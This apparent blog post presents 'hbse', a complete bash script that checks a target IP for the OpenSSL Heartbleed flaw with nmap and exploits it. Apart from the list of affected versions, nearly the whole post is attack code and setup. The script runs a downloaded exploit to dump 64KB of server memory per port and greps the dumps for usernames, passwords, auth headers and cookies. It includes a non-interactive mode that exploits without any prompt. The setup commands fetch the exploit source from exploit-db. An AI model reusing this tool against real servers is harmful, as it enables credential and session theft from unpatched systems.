# Heartbleed


Affected OpenSSL versions

The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.

Scan and exploit

# ./hbse 127.0.0.1 # Interactive mode.
# ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
# ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.

# cat hbse 
#!/bin/bash

### TCP ####

# 443  (HTTPS - HTTP over SSL)
# 465  (SMTPS - SMTP over SSL)
# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 989  (FTPS Data - FTP Data over TLS/SSL)
# 990  (FTPS Control - FTP Control over TLS/SSL)
# 992  (Telnet over TLS/SSL)
# 993  (IMAPS - IMAP over SSL)
# 995  (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)

### UDP ###

# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)

if [ $# -eq 1 ]; then
    ip="$1"
elif [ $# -eq 2 ]; then
    se="$1"
    ip="$2"
else
    exit
fi
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"

function print() {
    text="$1"
    color="$2"
    if [ "$color" == "gray" ]; then
        header="\e[38;5;250m"
    elif [ "$color" == "red" ]; then
        header="\e[91m"
    elif [ "$color" == "green" ]; then
        header="\e[92m"
    elif [ "$color" == "yellow" ]; then
        header="\e[93m"
    fi
    tail="\e[0m"
    echo -en $header$text$tail
}

print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"

if [ "$vulnerable" != "" ]; then
    print "Yes\n" "green"
    print "Checking if it is vulnerable on other ports... " "gray"
    vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
    n="`echo "$ports" | wc -l`"
    if [ "$n" == 1 ]; then 
        print "No\n" "red"
        w1="port"
        w2="it"
        w3="file"
    else
        print "Yes\n" "green"
        w1="ports"
        w2="them"
        w3="files"
    fi
    print "Vulnerable $w1:\n" "gray"
    print "$vports\n" "green"
    if [ "$se" == "--scan" ]; then exit
    elif [ "$se" == "--exploit" ]; then
        answer="Y"
    else
        print "Do you want to exploit $w2? [Yn] " "gray"
        read answer
    fi
    if [ "$answer" = "Y" ]; then
        print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
        exec 3<<< "$vports"
        while read port <&3; do
            print "+ Port [$port]\n" "gray"
            ofile="$ip.$port"
            if [ -f $ofile ]; then rm -f $ofile; fi
            if [ "$port" == "465" ]; then
                precmd='-c 0'
            elif [ "$port" == "993" ]; then
                precmd='-c 2'
            elif [ "$port" == "995" ]; then
                precmd='-c 1'
            else
                precmd=''
            fi
            ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
            if [ -f $ofile ]; then
                r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
                print "$r\n" "green"
                if [ "$se" != "--exploit" ]; then
                    print "Do you want to less the hexdump file? [Yn] " "gray"
                    read answer
                    if [ "$answer" = "Y" ]; then
                        hexdump -C $ofile | less
                    fi
                fi
            else
                print "Error: heartbleed did not work on port $port...\n" "yellow"
            fi
        done
        if [ "$se" != "--exploit" ]; then
            print "Do you want to delete the hexdump $w3? [Yn] " "gray"
            read answer
            if [ "$answer" = "Y" ]; then
                rm -f $ip.*
            fi
        fi
    fi
else
    print "No\n" "red"
fi

Requirements

# apt-get install nmap
# wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
# mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
# wget http://nmap.org/svn/nselib/tls.lua
# mv tls.lua /usr/share/nmap/nselib/.
# wget -O heartbleed.c http://www.exploit-db.com/download/32791
# gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
Posted by t0n1
Labels: , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)